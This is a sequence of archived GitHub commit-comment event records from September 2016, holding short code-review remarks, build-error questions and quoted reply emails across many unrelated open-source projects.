{"id":"4547067498","type":"CommitCommentEvent","actor":{"login":"smallccn"},"repo":{"name":"vrpn/vrpn"},"payload":{"comment":{"id":18979375,"position":null,"line":null,"path":null,"commit_id":"82d52fd67a5c1a637faa241fab66ce3c543b10df","created_at":"2016-09-12T02:44:41Z","updated_at":"2016-09-12T02:44:41Z","body":"Dear Sir,\r\n\r\nWith the latest code, I can't config it successfully on my PC, it will always show error \r\n\"CMake Error at cmake/FindDirectShow.cmake:110 (windowssdk_build_lookup):\r\n  Unknown CMake command \"windowssdk_build_lookup\".\"\r\n\r\nBut if config with the previouse code, it can be config successfully. \r\n\r\nhow can I do with the latest code? please share some guides. \r\n\r\nThanks."}},"created_at":"2016-09-12T02:44:41Z"}
{"id":"4547075180","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":18979393,"position":17,"line":17,"path":"ryu/app/simple_switch_rest_13.py","commit_id":"5f521b50d66c5aeba838640bc1372a66013183ba","created_at":"2016-09-12T02:48:20Z","updated_at":"2016-09-12T02:48:20Z","body":"【既存から】\r\nlogging は使ってなさそうです。"}},"created_at":"2016-09-12T02:48:20Z"}
{"id":"4547078710","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":18979399,"position":80,"line":80,"path":"ryu/app/simple_switch_rest_13.py","commit_id":"5f521b50d66c5aeba838640bc1372a66013183ba","created_at":"2016-09-12T02:49:59Z","updated_at":"2016-09-12T02:49:59Z","body":"【既存から】\r\nスペルミスっぽいです。2文字も...\r\nsimpl_switch_spp → simpl**e**\\_switch\\_**a**pp"}},"created_at":"2016-09-12T02:49:59Z"}
{"id":"4547080029","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":18979403,"position":82,"line":82,"path":"ryu/app/simple_switch_rest_13.py","commit_id":"5f521b50d66c5aeba838640bc1372a66013183ba","created_at":"2016-09-12T02:50:33Z","updated_at":"2016-09-12T02:50:33Z","body":"【既存から】\r\n`requirements` の前で改行できるので、改行した方が良さそうです。"}},"created_at":"2016-09-12T02:50:33Z"}
{"id":"4547084648","type":"CommitCommentEvent","actor":{"login":"diamondman"},"repo":{"name":"ArgyleStoat/Chutes"},"payload":{"comment":{"id":18979408,"position":16,"line":130,"path":"chutes.py","commit_id":"58dbb5242ec629c72384136d226d3651d984804a","created_at":"2016-09-12T02:52:46Z","updated_at":"2016-09-12T02:52:46Z","body":"Looks like this should be\r\ng - game(playersnum, b)"}},"created_at":"2016-09-12T02:52:46Z"}
{"id":"4547084980","type":"CommitCommentEvent","actor":{"login":"Horhew"},"repo":{"name":"Horhew/renderman_scene"},"payload":{"comment":{"id":18979409,"position":null,"line":null,"path":null,"commit_id":"6b013072ddd9d04820dcaf7c2767ca6133150b79","created_at":"2016-09-12T02:52:56Z","updated_at":"2016-09-12T02:52:56Z","body":"Added nfo."}},"created_at":"2016-09-12T02:52:56Z"}
{"id":"4547086827","type":"CommitCommentEvent","actor":{"login":"diamondman"},"repo":{"name":"ArgyleStoat/Chutes"},"payload":{"comment":{"id":18979411,"position":16,"line":130,"path":"chutes.py","commit_id":"58dbb5242ec629c72384136d226d3651d984804a","created_at":"2016-09-12T02:53:45Z","updated_at":"2016-09-12T02:53:45Z","body":"p1 = g.players[0] was used in early testing and can be removed."}},"created_at":"2016-09-12T02:53:45Z"}
{"id":"4547086920","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":18979412,"position":100,"line":100,"path":"ryu/app/simple_switch_rest_13.py","commit_id":"5f521b50d66c5aeba838640bc1372a66013183ba","created_at":"2016-09-12T02:53:47Z","updated_at":"2016-09-12T02:53:47Z","body":"eval をユーザ入力値に対して対して行うのは、脆弱性になるので、\r\n別のアプリでは、過去に修正した経緯があります。\r\n↓をご参考にしてください。\r\nhttps://github.com/osrg/ryu/blob/master/ryu/app/rest_router.py#L414-L417\r\n\r\n実装的には、ValueError をキャッチして、400 を返すとかが良さそうです。"}},"created_at":"2016-09-12T02:53:47Z"}
{"id":"4547091411","type":"CommitCommentEvent","actor":{"login":"mrjackinc"},"repo":{"name":"mrjackinc/rust-monster"},"payload":{"comment":{"id":18979416,"position":72,"line":524,"path":"src/ga/ga_population.rs","commit_id":"8964cde574c28542b1de77ebddb5263136892873","created_at":"2016-09-12T02:55:54Z","updated_at":"2016-09-12T02:55:54Z","body":"teheehee"}},"created_at":"2016-09-12T02:55:54Z"}
{"id":"4547095715","type":"CommitCommentEvent","actor":{"login":"anhtuank56"},"repo":{"name":"anhtuank56/QTM"},"payload":{"comment":{"id":18979421,"position":null,"line":null,"path":null,"commit_id":"ee46cdd9e6ddf21767cddd53c8dfde3289245dd3","created_at":"2016-09-12T02:57:58Z","updated_at":"2016-09-12T02:57:58Z","body":"không biết dùng\r\n"}},"created_at":"2016-09-12T02:57:58Z"}
{"id":"4547098339","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":18979427,"position":66,"line":66,"path":"ryu/app/simple_switch_lacp_13.py","commit_id":"5f521b50d66c5aeba838640bc1372a66013183ba","created_at":"2016-09-12T02:59:18Z","updated_at":"2016-09-12T02:59:18Z","body":"この `switch_features_handler` と `add_flow` も出来れば、\r\n継承を活用して削除したいです。"}},"created_at":"2016-09-12T02:59:18Z"}
{"id":"4547098383","type":"CommitCommentEvent","actor":{"login":"yd-li"},"repo":{"name":"YuBPan/py-utils"},"payload":{"comment":{"id":18979428,"position":null,"line":null,"path":null,"commit_id":"af0f5e600835ecdc5ff0e54735b71e7f18e910f4","created_at":"2016-09-12T02:59:20Z","updated_at":"2016-09-12T02:59:20Z","body":"66666"}},"created_at":"2016-09-12T02:59:20Z"}
{"id":"4547099641","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":18979429,"position":66,"line":66,"path":"ryu/app/simple_switch_igmp_13.py","commit_id":"5f521b50d66c5aeba838640bc1372a66013183ba","created_at":"2016-09-12T02:59:58Z","updated_at":"2016-09-12T02:59:58Z","body":"この switch_features_handler と add_flow も出来れば、\r\n継承を活用して削除したいです。"}},"created_at":"2016-09-12T02:59:58Z"}
{"id":"4551525212","type":"CommitCommentEvent","actor":{"login":"barryrld"},"repo":{"name":"pjcdawkins/platformsh-examples"},"payload":{"comment":{"id":18990671,"position":null,"line":null,"path":null,"commit_id":"950f7cd20907e0bf223d01467ca6533cdd86c31f","created_at":"2016-09-12T20:00:16Z","updated_at":"2016-09-12T20:00:16Z","body":"Bump on this. I had to submit a support request after getting errors with running sql-sync.\r\n\r\nI've sorted our issue by adding a mount point for drush-backups.\r\n\r\nAny chance of merging this PR in soon for pjcdawkins/platformsh-examples@950f7cd?"}},"created_at":"2016-09-12T20:00:16Z"}
{"id":"4551527855","type":"CommitCommentEvent","actor":{"login":"PierreR"},"repo":{"name":"bartavelle/language-puppet"},"payload":{"comment":{"id":18990676,"position":null,"line":null,"path":null,"commit_id":"294df629ccfb1f9cbf66107d8d2e2f46be3c663f","created_at":"2016-09-12T20:00:41Z","updated_at":"2016-09-12T20:00:41Z","body":"Do we really need to manage 4 digits ?\r\n\r\nIn a recent change of CHANGELOG I have assumed it was ok to go with just 3. Let me know if I need to change it ;-)"}},"created_at":"2016-09-12T20:00:41Z"}
{"id":"4551533396","type":"CommitCommentEvent","actor":{"login":"emk"},"repo":{"name":"faradayio/conductor"},"payload":{"comment":{"id":18990689,"position":null,"line":null,"path":null,"commit_id":"a698c46373c615ee18b761d262215b725d0301b4","created_at":"2016-09-12T20:01:40Z","updated_at":"2016-09-12T20:01:40Z","body":"Yup. It would be great to ultimately support a couple typical project types.\n\nFor now, I just need something that has development-only containers and\nsome one shot tasks, and Rails is a well known framework that gives me\neverything I need to figure out the next couple features. These are not the\nfinal project templates.\n\nLe 12 sept. 2016 3:53 PM, \"Derek Kastner\" <notifications@github.com> a\nécrit :\n\n> I don't think this tool should be wedded to any specific framework. What\n> I'd like to see in the future is some kind of plugin system that would add\n> support for frameworks, so conductor new foo -f rails would set\n> appropriate variables as needed.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/faradayio/conductor/commit/a698c46373c615ee18b761d262215b725d0301b4#commitcomment-18990548>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AACQY_33fmbU2jUAEAj2tHxqIGLTDDV7ks5qpa3RgaJpZM4J6y5G>\n> .\n>\n"}},"created_at":"2016-09-12T20:01:40Z"}
{"id":"4551541807","type":"CommitCommentEvent","actor":{"login":"dex2000"},"repo":{"name":"opening-hours/opening_hours_map"},"payload":{"comment":{"id":18990715,"position":null,"line":null,"path":null,"commit_id":"1d82098218d08930d2ea225b112e6dc446f8e503","created_at":"2016-09-12T20:03:13Z","updated_at":"2016-09-12T20:03:13Z","body":"this changes looks good (without stress-testing) but please make sure for the future that local hosting, for developement/testing/whatever uses // for selflinks (like \"//$server_self/$permalink\" or whatever)."}},"created_at":"2016-09-12T20:03:13Z"}
{"id":"4551543265","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":18990718,"position":null,"line":null,"path":null,"commit_id":"e6a5a25d50e4414a0bce7d6ca2e608df7bfe2d5e","created_at":"2016-09-12T20:03:28Z","updated_at":"2016-09-12T20:03:28Z","body":"movedPiece will always be TRUE."}},"created_at":"2016-09-12T20:03:28Z"}
{"id":"4551543661","type":"CommitCommentEvent","actor":{"login":"KevinW1998"},"repo":{"name":"Wohlhabend-Networks/PGE-Project"},"payload":{"comment":{"id":18990720,"position":72,"line":72,"path":"Editor/editing/_components/history/history_manager.h","commit_id":"a08d09e5669e729bfed27f0d23c1ce6ba72d5abd","created_at":"2016-09-12T20:03:32Z","updated_at":"2016-09-12T20:03:32Z","body":"too dirty, never do that. Add a function like \"setHistoryOwner\" or something like that"}},"created_at":"2016-09-12T20:03:32Z"}
{"id":"4551546267","type":"CommitCommentEvent","actor":{"login":"themightychris"},"repo":{"name":"SlateFoundation/slate-cbl"},"payload":{"comment":{"id":18990725,"position":null,"line":null,"path":null,"commit_id":"5c2dc1e33084ea890ad89f236491d1c4f0c6518d","created_at":"2016-09-12T20:04:00Z","updated_at":"2016-09-12T20:04:00Z","body":"@nbey ah, I see. I've never been a fan of using joins in searchConditions, harley had added that feature... it makes a lot of things get complicated and is a performance risk. I think in most cases it is better to specify an SQL generator function for the search condition that resolves any related data independently and normalizes the generated query to only hit one table (e.g. it could run a query to get all relevant IDs and then glue them into an `Field IN (1, 2, 3, 4)` clause"}},"created_at":"2016-09-12T20:04:00Z"}
{"id":"4551546311","type":"CommitCommentEvent","actor":{"login":"KevinW1998"},"repo":{"name":"Wohlhabend-Networks/PGE-Project"},"payload":{"comment":{"id":18990726,"position":80,"line":80,"path":"Editor/editing/_components/history/history_manager.h","commit_id":"a08d09e5669e729bfed27f0d23c1ce6ba72d5abd","created_at":"2016-09-12T20:04:01Z","updated_at":"2016-09-12T20:04:01Z","body":"why is that?"}},"created_at":"2016-09-12T20:04:01Z"}
{"id":"4551547589","type":"CommitCommentEvent","actor":{"login":"thomasdenney"},"repo":{"name":"Microsoft/pxt"},"payload":{"comment":{"id":18990731,"position":6,"line":754,"path":"webapp/public/custom.css","commit_id":"192ce21b34699b8d51f19fd99c88be0c0c702e49","created_at":"2016-09-12T20:04:17Z","updated_at":"2016-09-12T20:04:17Z","body":"I'll update it tomorrow."}},"created_at":"2016-09-12T20:04:17Z"}
{"id":"4551550119","type":"CommitCommentEvent","actor":{"login":"Adarsh-MR"},"repo":{"name":"AOSP-RRO/platform_build"},"payload":{"comment":{"id":18990736,"position":null,"line":null,"path":null,"commit_id":"2294000f40c171890819ae9ec6d5accd70de0ae4","created_at":"2016-09-12T20:04:40Z","updated_at":"2016-09-12T20:04:40Z","body":"lollipop *-*"}},"created_at":"2016-09-12T20:04:40Z"}
{"id":"4551553552","type":"CommitCommentEvent","actor":{"login":"ypid"},"repo":{"name":"opening-hours/opening_hours_map"},"payload":{"comment":{"id":18990753,"position":null,"line":null,"path":null,"commit_id":"1d82098218d08930d2ea225b112e6dc446f8e503","created_at":"2016-09-12T20:05:18Z","updated_at":"2016-09-12T20:05:18Z","body":"Sure, sounds good. Relative file paths for files in the project itself are already used. Just when it comes to external services I prefer to set this explicitly."}},"created_at":"2016-09-12T20:05:18Z"}
{"id":"4551556106","type":"CommitCommentEvent","actor":{"login":"KevinW1998"},"repo":{"name":"Wohlhabend-Networks/PGE-Project"},"payload":{"comment":{"id":18990762,"position":18,"line":18,"path":"Editor/editing/_components/history/history_manager.h","commit_id":"a08d09e5669e729bfed27f0d23c1ce6ba72d5abd","created_at":"2016-09-12T20:05:46Z","updated_at":"2016-09-12T20:05:46Z","body":"use pure virtual... meaning:\r\n`virutal void undo() = 0;`\r\n`virtual void redo() = 0;`\r\n`virutal QString actionDesc() = 0;`"}},"created_at":"2016-09-12T20:05:46Z"}
{"id":"4551559392","type":"CommitCommentEvent","actor":{"login":"vendethiel"},"repo":{"name":"IntegraMOD/IntegraMOD150"},"payload":{"comment":{"id":18990775,"position":null,"line":null,"path":null,"commit_id":"70b80a311aca6146e0e55006e3f26757386d82b3","created_at":"2016-09-12T20:06:25Z","updated_at":"2016-09-12T20:06:25Z","body":"It includes a modlist! hacks_list.php. 113 mods installed :)"}},"created_at":"2016-09-12T20:06:25Z"}
{"id":"4551559761","type":"CommitCommentEvent","actor":{"login":"kiwifb"},"repo":{"name":"Singular/Sources"},"payload":{"comment":{"id":18990777,"position":null,"line":null,"path":null,"commit_id":"58543e3f682941d3b62b869286d766749a9a385b","created_at":"2016-09-12T20:06:30Z","updated_at":"2016-09-12T20:06:30Z","body":"Looks like you merged `configure.ac` with `omalloc.pc.in`."}},"created_at":"2016-09-12T20:06:30Z"}
{"id":"4551560986","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18990786,"position":null,"line":null,"path":null,"commit_id":"20a9db4c8c81402a338f05ba96a294c025eda803","created_at":"2016-09-12T20:06:43Z","updated_at":"2016-09-12T20:06:43Z","body":"os_2_0_develop_linux (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-20a9db4c8c81402a338f05ba96a294c025eda803-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-20a9db4c8c81402a338f05ba96a294c025eda803-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-12T20:06:43Z"}
{"id":"4551561345","type":"CommitCommentEvent","actor":{"login":"parente"},"repo":{"name":"jupyter-incubator/dashboards_setup"},"payload":{"comment":{"id":18990787,"position":20,"line":16,"path":"docker_deploy/Dockerfile.dashboards","commit_id":"356b0c4c87d64628d2635e4443d76381b020e811","created_at":"2016-09-12T20:06:46Z","updated_at":"2016-09-12T20:06:46Z","body":"https://github.com/jupyter-incubator/dashboards_server#dashboard-server-w-auto-restart-and-self-signed-https-certificate\r\n\r\nIf you specify an HTTPS key and cert, it'll use HTTPS (iirc)."}},"created_at":"2016-09-12T20:06:46Z"}
{"id":"4551562597","type":"CommitCommentEvent","actor":{"login":"u01jmg3"},"repo":{"name":"s0600204/ics-parser-1"},"payload":{"comment":{"id":18990792,"position":17,"line":34,"path":"examples/index.php","commit_id":"a47277c32b24624096a7f1d4d04d52d06a37482b","created_at":"2016-09-12T20:07:00Z","updated_at":"2016-09-12T20:07:00Z","body":"Double quotes >> single quotes"}},"created_at":"2016-09-12T20:07:00Z"}
{"id":"4551563419","type":"CommitCommentEvent","actor":{"login":"u01jmg3"},"repo":{"name":"s0600204/ics-parser-1"},"payload":{"comment":{"id":18990795,"position":null,"line":null,"path":null,"commit_id":"a47277c32b24624096a7f1d4d04d52d06a37482b","created_at":"2016-09-12T20:07:11Z","updated_at":"2016-09-12T20:07:11Z","body":":+1:"}},"created_at":"2016-09-12T20:07:11Z"}
{"id":"4551564763","type":"CommitCommentEvent","actor":{"login":"earthgecko"},"repo":{"name":"russss/pydsn"},"payload":{"comment":{"id":18990797,"position":72,"line":72,"path":"parser.py","commit_id":"fd901137b3f5b672f3c873c51c1c3630710d4222","created_at":"2016-09-12T20:07:24Z","updated_at":"2016-09-12T20:07:24Z","body":"Hu @russss \r\n\r\nToday I realised the leg ranges are km, I know you are not using them per se though, so this is fairly trivial :)\r\n\r\nHowever I do have a few question though, you may know the answers to straight away.  Do you know if any of the following statements are True.\r\n\r\n- We can expect to see a spacecraft have an uplink with one dish and a down dish, both active simultaneously.\r\n- We can expect that is possible that the above may also occur on dishes in different sites.\r\n\r\nI am just asking as this afternoon I saw CHDR on 2 dishes, but only active on one, which is normal, just wondering what other multiple normals may exist.\r\n\r\n```\r\n2016-09-12 15:58:06 :: 24709 :: dsn_metrics :: station - gdscc - dish - DSS15 - target - CHDR\r\n2016-09-12 15:58:06 :: 24709 :: dsn_metrics :: dsn.spacecraft.CHDR.up_range.metres:131993.325|c\r\n2016-09-12 15:58:06 :: 24709 :: dsn_metrics :: dsn.spacecraft.CHDR.down_range.metres:131984.491|c\r\n2016-09-12 15:58:06 :: 24709 :: dsn_metrics :: dsn.spacecraft.CHDR.rtlt.seconds:0.880535|c\r\n2016-09-12 15:58:06 :: 24709 :: dsn_metrics :: dsn.station.gdscc.dishes.DSS24.online:1|c\r\n2016-09-12 15:58:06 :: 24709 :: dsn_metrics :: dsn.dishes.DSS24.azimuth_angle.degrees:93.91|c\r\n2016-09-12 15:58:06 :: 24709 :: dsn_metrics :: dsn.dishes.DSS24.elevation_angle.degrees:12.07|c\r\n2016-09-12 15:58:06 :: 24709 :: dsn_metrics :: dsn.dishes.DSS24.wind_speed.kmph:23.46|c\r\n2016-09-12 15:58:06 :: 24709 :: dsn_metrics :: dsn.spacecraft.CHDR.down.DSS24.frequency.Hz:2274999585.48|c\r\n2016-09-12 15:58:06 :: 24709 :: dsn_metrics :: dsn.spacecraft.CHDR.down.DSS24.power.dBm:-130.435791|c\r\n2016-09-12 15:58:06 :: 24709 :: dsn_metrics :: dsn.spacecraft.CHDR.down.DSS24.data_rate.bits:6400.008789|c\r\n2016-09-12 15:58:06 :: 24709 :: dsn_metrics :: station - gdscc - dish - DSS24 - target - CHDR\r\n2016-09-12 15:58:06 :: 24709 :: dsn_metrics :: dsn.spacecraft.CHDR.up_range.metres:131998.901|c\r\n2016-09-12 15:58:06 :: 24709 :: dsn_metrics :: dsn.spacecraft.CHDR.down_range.metres:131990.066|c\r\n2016-09-12 15:58:06 :: 24709 :: dsn_metrics :: dsn.spacecraft.CHDR.rtlt.seconds:0.880572|c\r\n2016-09-12 15:58:06 :: 24709 :: dsn_metrics :: dsn.station.gdscc.dishes.DSS25.online:1|c\r\n2016-09-12 15:58:06 :: 24709 :: dsn_metrics :: dsn.dishes.DSS25.azimuth_angle.degrees:97.83|c\r\n2016-09-12 15:58:06 :: 24709 :: dsn_metrics :: dsn.dishes.DSS25.elevation_angle.degrees:10.23|c\r\n2016-09-12 15:58:06 :: 24709 :: dsn_metrics :: dsn.dishes.DSS25.wind_speed.kmph:23.46|c\r\n2016-09-12 15:58:06 :: 24709 :: dsn_metrics :: dsn.spacecraft.ORX.down.DSS25.frequency.Hz:8445608679.02|c\r\n```\r\n\r\nI only want to metric on acitve/connected even idle as long as the spacecraft doing something with the dish states.  And shuffling around namespace relationships, ideally I would like to metric all at 1s:20y but... storage, compute cost etc :)  So for Graphite and Skyline 1 datapoint per 60s but I would like to try something with NuPIC HTM at every second resolution.  NuPIC at 1s may be easier than Graphite. et al at 10s.\r\n\r\nAnyway OSIRIS-REx another to watch ;)  More metrics - currently at my current namespace distribution it is at 2968 metrics, with retentions = 60s:30d,600s:5y = 10.3 GB if 36 spacecraft.\r\n\r\nAll are nicely classifiable I think, but watching all the xml and logs I am kind of sliding in down a slope to NuPIC more than scikit-learn at the moment.\r\n\r\nI just know down the line it is going to good to have spacecraft.dish and spacecraft.total namespaces and not just my current dish -> each.spacecraft :)  More metrics...\r\n\r\nJust pointed out all the retention params, etc as I am sure that you may have some insights into the DSN pycularities :)\r\n\r\nbtw - thank you for ushering me into this rabbithole, it is a very intriguing, yet fairly simple data set :)  One that makes one think a bit further at the very least.\r\n\r\nThat and the fact that after monitoring 100s of machines on the planet for years, we can now try and focus similar systems and methodologies and add Voyager 1 to our monitoring pipelines, et all.  We can monitor some aspect of the most distant of humanity's machines.\r\n\r\nIf we have to spend our time monitoring machines, why not those that have gone where no machine has gone before ... :)\r\n\r\nMonitoring machines in the cloud, so 20xx\r\nMonitoring machines in the plasma :)\r\n\r\nWe have Kepler, DSN and soon GAIA (and tons more), we live in interesting times.\r\n\r\nSo I have one more question for you.  Have you had any thoughts about any machine learning models that would fit this data set nicely? "}},"created_at":"2016-09-12T20:07:24Z"}
{"id":"4551565840","type":"CommitCommentEvent","actor":{"login":"guyd"},"repo":{"name":"mldbai/mldb"},"payload":{"comment":{"id":18990800,"position":8,"line":5,"path":"mongodb/doc/MongoQueryFunction.md","commit_id":"9bac08cb80e915b449742bd716b3d9715b5dc9a9","created_at":"2016-09-12T20:07:36Z","updated_at":"2016-09-12T20:07:36Z","body":"typo"}},"created_at":"2016-09-12T20:07:36Z"}
{"id":"4551565879","type":"CommitCommentEvent","actor":{"login":"shamasis"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18990801,"position":5,"line":179,"path":"lib/collection/property.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T20:07:36Z","updated_at":"2016-09-12T20:07:36Z","body":"What outside? No need to use this unless needed. "}},"created_at":"2016-09-12T20:07:36Z"}
{"id":"4551567772","type":"CommitCommentEvent","actor":{"login":"JoeTheHuman"},"repo":{"name":"JoeTheHuman/Scammer-Bingo-Reborn"},"payload":{"comment":{"id":18990807,"position":null,"line":null,"path":null,"commit_id":"2ed3ebeac9c88cce543ec9dfb2d3982483b822e7","created_at":"2016-09-12T20:07:58Z","updated_at":"2016-09-12T20:07:58Z","body":"Java link fixed, and, there's not much I can do about WINE. It's an emulator, I can't control how it performs on it. @ask-compu "}},"created_at":"2016-09-12T20:07:58Z"}
{"id":"4551569240","type":"CommitCommentEvent","actor":{"login":"rohitporoli"},"repo":{"name":"AOSP-RRO/platform_build"},"payload":{"comment":{"id":18990814,"position":null,"line":null,"path":null,"commit_id":"2294000f40c171890819ae9ec6d5accd70de0ae4","created_at":"2016-09-12T20:08:15Z","updated_at":"2016-09-12T20:08:15Z","body":"@Adarsh-MR Lol :P "}},"created_at":"2016-09-12T20:08:15Z"}
{"id":"4551569368","type":"CommitCommentEvent","actor":{"login":"shamasis"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18990815,"position":24,"line":151,"path":"lib/collection/response.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T20:08:16Z","updated_at":"2016-09-12T20:08:16Z","body":"That was for reference only. But curious - LJSON is already in develop!!!!"}},"created_at":"2016-09-12T20:08:16Z"}
{"id":"4551573333","type":"CommitCommentEvent","actor":{"login":"collin"},"repo":{"name":"theonion/bulbs-elements"},"payload":{"comment":{"id":18990825,"position":null,"line":null,"path":null,"commit_id":"28a9df198cf78c2e4a0f17c4b063c8dc5ad06a86","created_at":"2016-09-12T20:08:58Z","updated_at":"2016-09-12T20:08:58Z","body":"Bless you."}},"created_at":"2016-09-12T20:08:58Z"}
{"id":"4551574597","type":"CommitCommentEvent","actor":{"login":"ask-compu"},"repo":{"name":"JoeTheHuman/Scammer-Bingo-Reborn"},"payload":{"comment":{"id":18990831,"position":null,"line":null,"path":null,"commit_id":"2ed3ebeac9c88cce543ec9dfb2d3982483b822e7","created_at":"2016-09-12T20:09:14Z","updated_at":"2016-09-12T20:09:14Z","body":"@JoeTheHuman i know, just thought i would mention it"}},"created_at":"2016-09-12T20:09:14Z"}
{"id":"4551575783","type":"CommitCommentEvent","actor":{"login":"kunalspathak"},"repo":{"name":"kunalspathak/ChakraCore"},"payload":{"comment":{"id":18990834,"position":null,"line":null,"path":null,"commit_id":"a3eeed171c56fb4b4f5c50b6fb2bf38a114b94da","created_at":"2016-09-12T20:09:27Z","updated_at":"2016-09-12T20:09:27Z","body":"@digitalinfinity, can you take a look?"}},"created_at":"2016-09-12T20:09:27Z"}
{"id":"4551577590","type":"CommitCommentEvent","actor":{"login":"mikiones"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":18990839,"position":null,"line":null,"path":null,"commit_id":"e45800f5ab637a1f33bd3f21187e96edf61bd9d9","created_at":"2016-09-12T20:09:47Z","updated_at":"2016-09-12T20:09:47Z","body":"i looked briefly on it, to much work to be it valuable at this stage of development there is too much work to be done. and now the simple calculate path for 4 new steps is good enough. "}},"created_at":"2016-09-12T20:09:47Z"}
{"id":"4551580462","type":"CommitCommentEvent","actor":{"login":"shamasis"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18990846,"position":35,"line":181,"path":"lib/collection/response.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T20:10:20Z","updated_at":"2016-09-12T20:10:20Z","body":"What is the consistency here? If you don't need to use self in closure (which I don't see in this case) don't use. Like I said, it's not maintainable and causes bugs. "}},"created_at":"2016-09-12T20:10:20Z"}
{"id":"4551583588","type":"CommitCommentEvent","actor":{"login":"olibre"},"repo":{"name":"cpp-frug/materials"},"payload":{"comment":{"id":18990855,"position":6,"line":353,"path":"news/2016_n3_Cpp17_Nouveautes-du-langage.md","commit_id":"0a5baf033fbc3f50205c0cd450097f8743ee91a4","created_at":"2016-09-12T20:10:52Z","updated_at":"2016-09-12T20:10:52Z","body":"Oui c'est tout a fait ça :-)\r\nSi je ne me trompe pas, et en mettant de côté les `'` dans les nombres, en regex cela fait :\r\n\r\n* `0[xX][0-9a-fA-F]+[.]?[pP][+-]?[0-9]+[fFlL]?`\r\n* `0[xX][0-9a-fA-F]*[.][0-9a-fA-F]+[pP][+-]?[0-9]+[fFlL]?`\r\n\r\nDonc pas de `0x2.8F` ou `0x2.8E-2` ;-)"}},"created_at":"2016-09-12T20:10:52Z"}
{"id":"4551584553","type":"CommitCommentEvent","actor":{"login":"shamasis"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18990860,"position":14,"line":155,"path":"lib/collection/url.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T20:11:04Z","updated_at":"2016-09-12T20:11:04Z","body":"Why? Isn't the test in develop passing? "}},"created_at":"2016-09-12T20:11:04Z"}
{"id":"4551587374","type":"CommitCommentEvent","actor":{"login":"shamasis"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18990872,"position":43,"line":219,"path":"lib/collection/url.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T20:11:35Z","updated_at":"2016-09-12T20:11:35Z","body":"But where in this function are you binding it?"}},"created_at":"2016-09-12T20:11:35Z"}
{"id":"4551588970","type":"CommitCommentEvent","actor":{"login":"adhg"},"repo":{"name":"adhg/pyDev1"},"payload":{"comment":{"id":18990875,"position":null,"line":null,"path":null,"commit_id":"73793d6b8f0cbc831215cb78faceefb9090c2318","created_at":"2016-09-12T20:11:53Z","updated_at":"2016-09-12T20:11:53Z","body":"yes comment again "}},"created_at":"2016-09-12T20:11:53Z"}
{"id":"4551589625","type":"CommitCommentEvent","actor":{"login":"newluck77"},"repo":{"name":"newluck77/fprsmap"},"payload":{"comment":{"id":18990877,"position":17,"line":37,"path":"js/main.js","commit_id":"4ae223217032e27f161ed16ce2cb0010068753b5","created_at":"2016-09-12T20:12:01Z","updated_at":"2016-09-12T20:12:01Z","body":"Yeah, I've seen this examples on mdn, but they are quite trivial in \ncomparison to your implementation here in the map.\n\nAm 12.09.2016 um 21:56 schrieb Roberto M.F.:\n> Sorry, I misread the first value of the array and did a mess in my head.\n> You are totally right!\n>\n> Quick tests (run on the Fx's developer console, F12):\n>\n>   * Without |initValue|: |[1, 2].reduce(function sum(init, curr) {\n>     console.log(init, curr); return init + curr; });|\n>   * With |initValue|: |[2, 3].reduce(function sum(init, curr) {\n>     console.log(init, curr); return init + curr; }, 1);|\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/newluck77/fprsmap/commit/4ae223217032e27f161ed16ce2cb0010068753b5#commitcomment-18990599>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIiMgTvBEOHGywNSZ4T7SGmUxsMl25M9ks5qpa5sgaJpZM4J64kL>.\n>\n> E-Mail ist virenfrei.\n> Von AVG überprüft - www.avg.com <http://www.avg.com>\n> Version: 2016.0.7752 / Virendatenbank: 4656/13004 - Ausgabedatum:\n> 12.09.2016\n>\n"}},"created_at":"2016-09-12T20:12:01Z"}
